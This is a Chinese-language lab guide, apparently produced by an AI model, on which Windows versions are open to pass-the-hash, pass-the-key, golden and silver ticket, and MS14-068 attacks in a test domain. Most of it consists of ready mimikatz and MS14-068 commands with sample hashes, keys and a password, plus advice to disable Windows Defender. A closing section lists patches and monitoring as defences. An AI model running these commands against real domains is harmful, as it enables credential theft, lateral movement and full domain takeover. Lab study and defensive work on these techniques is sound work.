根据提供的系统版本(Windows 7 SP1、Windows 10 LTSC 2019、Windows Server 2012 R2)和攻击类型(PTH/PTK/PTT/黄金票据/白银票据),以下是适配性分析及操作建议:
一、PTH(Pass the Hash)横向攻击适配性
1. Windows 7 SP1
-
支持性:完全支持(默认未安装KB2871997补丁)
-
攻击条件:
-
未打补丁时,所有用户均可通过LM/NTLM哈希传递
-
若已安装KB2871997补丁,仅支持Administrator用户传递
-
-
实验命令:
bash
复制
mimikatz "sekurlsa::pth /user:administrator /domain:mamba.com /ntlm:168665b84b96d6973f867364f53b0180"
-
防御绕过:需关闭Windows Defender实时监控(通过注册表或组策略)13
2. Windows 10 LTSC 2019
-
支持性:受限(默认集成KB2871997补丁)
-
攻击条件:仅支持Administrator用户的NTLM哈希传递
-
限制:若启用Credential Guard或LSA保护,需额外绕过措施7
3. Windows Server 2012 R2
-
支持性:受限(默认安装KB2871997补丁)
-
攻击条件:仅支持Administrator用户,且需目标开放SMB服务(445端口)
-
推荐场景:优先使用PTK(AES256)或PTT攻击26
二、PTK(Pass the Key)横向攻击适配性
1. Windows 7 SP1
-
支持性:需手动安装KB2871997补丁后可用
-
攻击条件:需获取AES256密钥(通过
sekurlsa::ekeys
) -
实验命令:
bash
复制
mimikatz "sekurlsa::pth /user:mamba /domain:mamba.com /aes256:a7ddbb2c4b7216746b8c523cf7995d2ed4c29f2ee4b795175b5ffce97ded3387"
2. Windows 10 LTSC 2019
-
支持性:完全支持(默认启用AES加密)
-
优势:绕过NTLM限制,支持所有用户传递9
3. Windows Server 2012 R2
-
支持性:完全支持(补丁默认生效)
-
适用场景:针对禁用NTLM的域环境,需结合服务识别(如LDAP/CIFS)6
三、PTT(Pass the Ticket)横向攻击适配性
1. 黄金票据(Golden Ticket)
-
适用系统:所有系统(依赖域控权限)
-
攻击条件:
-
获取krbtgt用户的NTLM Hash(
lsadump::dcsync
) -
域名、域SID信息
-
-
实验命令:
bash
复制
mimikatz "kerberos::golden /admin:administrator /domain:mamba.com /sid:S-1-5-21-XXXX /krbtgt:be0e527500207aa091f504474347f48b /ticket:golden.kirbi" kerberos::ptt golden.kirbi
-
适配性:适用于所有系统,但需域控(如Server 2012 R2)未启用AES强制加密37
2. 白银票据(Silver Ticket)
-
适用系统:所有系统(需目标服务支持)
-
攻击条件:
-
服务账户的NTLM Hash(如CIFS/SQL Server)
-
域名、域SID、服务SPN
-
-
实验命令:
bash
复制
mimikatz "kerberos::golden /user:mamba /domain:mamba.com /sid:S-1-5-21-XXXX /target:dc.mamba.com /service:cifs /rc4:08972e15b1763a8537f276b159840c17 /ticket:silver.kirbi"
-
适配性:尤其适合Windows Server 2012 R2(常见域控服务如CIFS/LDAP)8
3. MS14-068漏洞利用
-
适用系统:仅未打补丁的Windows Server 2012 R2及更早版本
-
限制:需普通域用户权限,且目标域控未安装KB3011780补丁
-
实验步骤:
bash
复制
MS14-068.exe -u mamba3@mamba.com -s S-1-5-21-XXXX -d 192.168.128.128 -p Zrs123456.. kerberos::ptc TGT_administrator@mamba.com.ccache
-
适配性:Windows 7/Server 2012 R2可能适用,Windows 10已修复17
四、靶机适配性总结
攻击类型 | Windows 7 SP1 | Windows 10 LTSC 2019 | Windows Server 2012 R2 |
---|---|---|---|
PTH(NTLM) | ✅(未打补丁) | ⚠️(仅Administrator) | ⚠️(仅Administrator) |
PTK(AES256) | ⚠️(需补丁) | ✅ | ✅ |
黄金票据 | ✅ | ✅ | ✅(最佳适配域控) |
白银票据 | ✅(CIFS服务) | ✅(需服务支持) | ✅(最佳适配CIFS/LDAP) |
MS14-068漏洞 | ✅ | ❌(已修复) | ⚠️(需未打补丁) |
五、防御建议
-
补丁管理:确保所有系统安装KB2871997(PTH限制)、KB3011780(MS14-068修复)27
-
加密策略:强制使用AES256替代RC4,禁用NTLM协议3
-
日志监控:审计Kerberos票据事件(事件ID 4769/4771),检测异常票据生成8
-
权限控制:限制本地管理员账户同名问题,启用LSA保护9
如需进一步验证攻击路径,可使用systeminfo
查看补丁状态,或通过BloodHound分析域内信任关系。